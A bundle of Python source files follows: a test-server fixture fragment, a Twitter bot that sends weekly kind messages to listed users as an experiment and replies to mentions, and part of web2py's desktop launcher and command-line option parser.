port = 8765
app = create_app()
server = Process(target=app.run, kwargs={"port": port, "debug": True, "use_reloader": False})
server.start()
yield server
server.terminate()
server.join()
|
tweet.py | #!/usr/bin/env python3
# Tweet at the users found in the user id text file (specified in setup.py)
# Not to be run simultaneously as the find_users.py script
# Also have a streamer that replies to replies
# OK, so what's the plan?
# I want to send people tweets at times when they tend to send their offensive tweets.
# This is to magnify the impact of the kind tweet.
# We really don't want the bot getting suspended for sending unsolicited tweets to people.
# Therefore, this procedure needs to be thoroughly scrutinized before launching the actual project.
# This is perhaps not very important. The timing, I mean.
# Rather, I should focus on getting the measurement correct, while still ensuring that each person gets sent one tweet a week.
# Thus, have a week-long loop. At start, it randomly scrambles the user id list, and at a set interval tweets to the users in the list's order.
# This will make the sending of the tweets truly random, and perfectly spread out (so as to minimize the risk of violating the API restrictions).
# import twythonaccess to be able to send tweets
import twythonaccess
from twythonaccess import TwitterApp
# import setup
import setup
# import the streamer
from streamer import TweetStreamer
# import threading
from threading import Thread
# import datetime
from datetime import datetime
# errors!
import error_messenger
# for shuffling the user ids list
import random
# we need to be able to sleep
import time
# the unscrambled list of user ids, as loaded directly from the user id text file
user_ids = []
# this is a dictionary containing the screen name for every user id
screen_name_for_user_id = {}
# a dictionary of user_id -> sent responses, so as to not send the same response to the same user twice
# thus, dict<int, set<string>>, as expressed in some pseudo-c++ syntax (set instead of list?)
# remember that, if this process is run for a long time, you may run out of responses. thus, be sure to reset the list of taken responses when it has the same length as the responses list itself
sent_responses_to_user = {}
# a list of the responses, as loaded directly from the responses.txt text file
# (consequently, one cannot simply update the responses text file to make the bot send the new responses – this process needs to be restarted as well)
responses = []
# When this flag is set to true, all processes and threads should ideally stop executing
self_destruction_flag = False
# we need the mentions streamer as a global, so as to be able to disconnect it gracefully at self destruction
mentions_streamer_object = None
# The main function, which should start both the mentions streamer and the tweet loop
def main():
print("main")
# setup is important
set_up()
print("setup done")
# one thread should be the mentions streamer
mentions_thread = Thread(target = mentions_streamer)
# one thread should be the tweet loop
tweet_loop_thread = Thread(target = tweet_loop)
# start the threads
mentions_thread.start()
tweet_loop_thread.start()
# We need a way to self destruct ourselves, so as to be able to stop sending tweets
def self_destruct():
# First, set the self destruction flag to true
global self_destruction_flag
self_destruction_flag = True
# Then, disconnect the mentions streamer
global mentions_streamer_object
mentions_streamer_object.disconnect()
def set_up():
# do some setup first, like loading the user ids into a list,
# and also create the dictionary of user ids to sent responses
# finally, load the list of responses from the responses text file, for easy access
# load the user ids
global user_ids
with open(setup.USER_IDS_PATH, "r") as user_ids_file:
for line in user_ids_file:
sml = [x for x in line.strip().split()]
user_id = int(sml[0])
user_ids.append(user_id)
# find the screen name for every user id
global screen_name_for_user_id
# if we can't get the screen name, then something's wrong
# add that user to the remove queue
remove_list = []
for user_id in user_ids:
# use the mentions app for checking up the user
# this is since it is less critical than the tweeting app, while having the same privileges
# if rate limited, wait for 1 minute, and then try again
# the show user request can be sent 900 times per 15 minute window
while twythonaccess.currently_rate_limited(TwitterApp.mentions, 900):
time.sleep(60)
# get the screen name of the user
try:
screen_name = twythonaccess.authorize(TwitterApp.mentions).show_user(user_id = user_id)["screen_name"]
screen_name_for_user_id[user_id] = screen_name
except Exception as exception:
# can't find screen name of this user
print(exception)
remove_list.append(user_id)
print("Can't find screen name of user with id: " + str(user_id))
error_messenger.send_error_message("Removing " + str(len(remove_list)) + " users due to inability to get their screen name.", "tweet.py > set_up()")
for user_id in remove_list:
user_ids.remove(user_id)
# create the dictionary of empty sets per each user id
global sent_responses_to_user
for user_id in user_ids:
sent_responses_to_user[user_id] = set()
# load the responses from the responses.txt file
global responses
with open(setup.RESPONSES_PATH, "r") as responses_file:
for line in responses_file:
response = line.strip()
responses.append(response)
# Set up the mentions streamer, viz. the streamer that should find all tweets mentioning the bot, and reply to them with emoji hearts
# Runs indefinitely, and thus needs error handling
def mentions_streamer():
print("mentions streamer")
# initialize the mentions streamer
# use the mentions app
global mentions_streamer_object
mentions_streamer_object = TweetStreamer(setup.MENTIONS_CONSUMER_KEY, setup.MENTIONS_CONSUMER_SECRET, setup.MENTIONS_ACCESS_TOKEN, setup.MENTIONS_ACCESS_TOKEN_SECRET)
# for error logs
mentions_streamer_object.arvid220u_error_title = "tweet.py > mentions_streamer()"
# add the observer (the new_mention method)
mentions_streamer_object.arvid220u_add_observer(new_mention)
# start streaming
# wrap it in error handling
while not self_destruction_flag:
try:
# RTs will automatically be discarded (default setting)
# check for tweets referencing self
mentions_streamer_object.statuses.filter(track=("@" + setup.TWITTER_USERNAME))
except Exception as exception:
# If self destruction flag is true, then continue (same as break)
if self_destruction_flag:
break
# check if exception is incomplete read: then, just restart immediately
"""if str(exception) == "('Connection broken: IncompleteRead(0 bytes read, 1 more expected)', IncompleteRead(0 bytes read, 1 more expected))":
continue
if str(exception) == "('Connection broken: IncompleteRead(0 bytes read, 2 more expected)', IncompleteRead(0 bytes read, 2 more expected))":
continue"""
if str(exception).startswith("('Connection broken: IncompleteRead"):
print("restarting")
continue
# print the exception and then sleep for an hour,
# and hope that the problem will resolve itself, magically
# (as it almost always does, since the problem is probably in Twitter's servers, or something)
print("tweet.py > mentions_streamer(): ")
print(exception)
error_messenger.send_error_message(exception, "tweet.py > mentions_streamer()")
print("will sleep for one hour to avoid exception")
time.sleep(60*60)
print("finished sleep in tweet.py > mentions_streamer. will now start anew")
# Map: user_id -> timestamp
# Timestamp records when the user with the id user_id was replied to
# This is to ensure that no more than a maximum of one reply per day is sent to one and the same user
replied_to_users = {}
# Whenever a new tweet referencing self is discovered, this method is called
# The argument is the ordinary tweet dictionary, as provided by twitter, without any changes
def new_mention(tweet):
# if the self desturction flag is on, then return immediately
if self_destruction_flag:
return
# first check so that the user actually did mention the bot
did_mention = False
for user_mention in tweet["entities"]["user_mentions"]:
if user_mention["screen_name"] == setup.TWITTER_USERNAME:
did_mention = True
if not did_mention:
# return early if no mention
# it's strange that this can happen
return
# hmm... Should it be possible for a user to be replied to many times, or should there be a limit on the number of responses per user?
# This is interesting, though I'm not sure whether I know the perfect strategy.
# Perhaps, the best way to go is to only reply once in a specified time range (say 1 day), instead of having it applied for all time
# Yep, go with that.
# Have a map: user_id -> timestamp.
# the user to respond to
user_id = tweet["user"]["id"]
# check if that user is in the replied to users
global replied_to_users
if user_id in replied_to_users:
# check whether the time passed since timestamp is less than one day
now_time = datetime.utcnow()
if (now_time - replied_to_users[user_id]).total_seconds() < 24*60*60:
# simply return here, prematurely
return
# don't do anything. we will update the timestamp at a later stage
# first check if the mentions app is currently rate limited, to later get its screen name
# if it is rate limited, return silently, so as not to build up a queue here
reply_to_screen_name = tweet["user"]["screen_name"]
# create the tweet
reply_tweet = "@" + reply_to_screen_name + " " + setup.REPLY_TWEET
# send the tweet, and check whether it was actually sent
if twythonaccess.send_tweet(reply_tweet, TwitterApp.mentions, in_reply_to_status_id = tweet["id"]):
# yay, tweet was sent
# now add this user to the replied to users map, along with the current timestamp
replied_to_users[user_id] = datetime.utcnow()
# The tweet loop runs indefinitely, sending one tweet per week per user, at a randomly assigned time.
# Needs thorough error handling.
# If an error occurs here, a lot is lost on the experiment
# Therefore, immediately retry a couple of times upon receiving the error
def tweet_loop():
global user_ids
global sent_responses_to_user
global responses
global screen_name_for_user_id
print("tweet loop")
# have an infinte loop
# every loop iteration should take one week, and in each iteration, exactly one tweet should be sent to each user
while not self_destruction_flag:
start_time = datetime.utcnow()
# first, scramble the user ids list so as to make the sending of the users completely random
user_ids_sendlist = user_ids[:]
random.shuffle(user_ids_sendlist)
# calculate the interval, so as to make the loop week-long
# we do care about achieving perfect week-loops, which is why we make the interval a tiny bit shorter (one hour) than actually needed, and storing the starting time
# (the reason we care is for measuring purposes, and credibility in statistics, etc)
# the tweet interval is measured in seconds
tweet_interval = ((7*24*60*60-60*60) / len(user_ids))
# now iterate over each user id in the sendlist
for user_id in user_ids_sendlist:
# if we are in self destruction, then return here (and yes, I know, it may be that not all users receive the same amount of tweets, this way)
# (continuing thought: but it is of utter importance to have the treatment stop at the given signal)
if self_destruction_flag:
break
# randomly choose a tweet from the response list
# do it repeatedly until a response that has not yet been sent to this user is found
# first, check whether the response set for this user has a length that is equal to the response list – if so, reset it
if len(sent_responses_to_user[user_id]) >= len(responses):
sent_responses_to_user[user_id] = set()
response = responses[random.randint(0,len(responses)-1)]
while response in sent_responses_to_user[user_id]:
response = responses[random.randint(0,len(responses)-1)]
# send this response to the user, mentioning them
response_tweet = "@" + screen_name_for_user_id[user_id] + " " + response + " " + setup.RESPONSE_SUFFIX
# send this tweet
# don't care whether it is sent or not – as long as there are not too many users, it should be sent without any problem
# risk is twitter banning the bot due to its messages being considered unsolicited and rude
try:
twythonaccess.send_tweet(response_tweet, TwitterApp.tweeting)
except Exception as exception:
# oh no! an error occured
# well then. just sleep for sixteen minutes (we have one hour spare), and try once again. if it doesn't work this time, something's severly wrong
print(exception)
error_messenger.send_error_message(exception, "tweet.py > tweet_loop()")
print("will sleep for twenty minutes to try to avoid the exception")
time.sleep(16*60)
print("has slept for twenty minutes and will retry sending the tweet")
if self_destruction_flag:
break
try:
twythonaccess.send_tweet(response_tweet, TwitterApp.tweeting)
except Exception as exception2:
# no no no no no!
# this is not where we want to end up
# switch to the backup tweeting app, by setting the twythonaccess backup mode to on
# also send an urgency error message, explaining what's happening
print(exception)
print("toggling backup mode in tweeting app")
twythonaccess.tweeting_in_backup_mode = not twythonaccess.tweeting_in_backup_mode
error_messenger.send_error_message("IMPORTANT: Tweeting app now toggled its backup mode", "tweet.py > tweet_loop()")
try:
twythonaccess.send_tweet(response_tweet, TwitterApp.tweeting)
except Exception as exception3:
# i have no idea what to do by now. probably, just shut the whole thing down
# we're doomed if we reach this point
# goodbye, world
print(exception)
error_messenger.send_error_message(exception, "tweet.py > tweet_loop()")
error_messenger.send_error_message("We're all doomed. Exception couldn't be resolved, even after tremendous effort. Now, ignoring the error.", "tweet.py > tweet_loop()")
# add the chosen response to the sent responses set
sent_responses_to_user[user_id].add(response)
# now, sleep for the specified interval
time.sleep(tweet_interval)
# great. all users have been addressed
# now, sleep until exactly one week has passed since the start time
while (datetime.utcnow() - start_time).total_seconds() <= 7*24*60*60:
time.sleep(1)
# if called directly (as in "python3 mainbot.py"), then call main() function
if __name__ == "__main__":
main()
|
widget.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py.
"""
import datetime
import sys
import cStringIO
import time
import thread
import threading
import os
import socket
import signal
import math
import logging
import newcron
import getpass
import gluon.main as main
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.5', '2.6', '2.7']:
msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
if major_version == 2:
if minor_version in (5, 6):
sys.stderr.write("Python 2.5 or 2.6\n")
ret = subprocess.call(['unit2', '-v', 'gluon.tests'])
elif minor_version in (7,):
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Only Python 2.x supported.\n")
ret = 256
sys.exit(ret and 1)
class IO(object):
""" """
def __init__(self):
""" """
self.buffer = cStringIO.StringIO()
def write(self, data):
""" """
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print 'please visit:'
print '\t', url
print 'starting browser...'
try:
import webbrowser
webbrowser.open(url)
except:
print 'warning: unable to detect your browser'
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
bg_color = 'white'
root.withdraw()
self.root = Tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0,0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, 'httpserver.log')
iconphoto = os.path.join('extras','icons','web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# Prepare the logo area
self.logoarea = Tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras','icons','splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = Tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
Tkinter.Label(self.bannerarea, anchor=Tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=Tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack( side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
Tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=Tkinter.W, text='%s (%s)' % (legend, ip),
justify=Tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
Tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
apps = []
available_apps = [arq for arq in os.listdir('applications/')]
available_apps = [arq for arq in available_apps
if os.path.exists(
'applications/%s/models/scheduler.py' % arq)]
if start:
#the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
#reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon import current;current._scheduler.loop()"
print 'starting scheduler from widget for "%s"...' % app
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print "Currently running %s scheduler processes" % (
len(self.scheduler_processes))
p.start()
print "Processes started"
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Check taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Update app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connect pages """
#reset the menu
available_apps = [arq for arq in os.listdir('applications/')
if os.path.exists(
'applications/%s/__init__.py' % arq)]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finish the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Show error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Start web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception, e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stop web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Update canvas """
try:
t1 = os.path.getsize('httpserver.log')
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open('httpserver.log', 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
msg = ('password to be used for administration '
'(use -a "<recycle>" to reuse the last password))')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
help='timeout for socket (5 second)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
'allowed. Requires a scheduler defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
msg = ('should be followed by a list of arguments to be passed to script, '
'to be used with -S, -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
msg = ('adds coverage reporting (needs --run_system_tests), '
'python 2.7 and the coverage module installed. '
'You can alter the default path setting the environmental '
'var "COVERAGE_PROCESS_START". '
'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
global_settings.cmd_options = options
global_settings.cmd_args = args
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
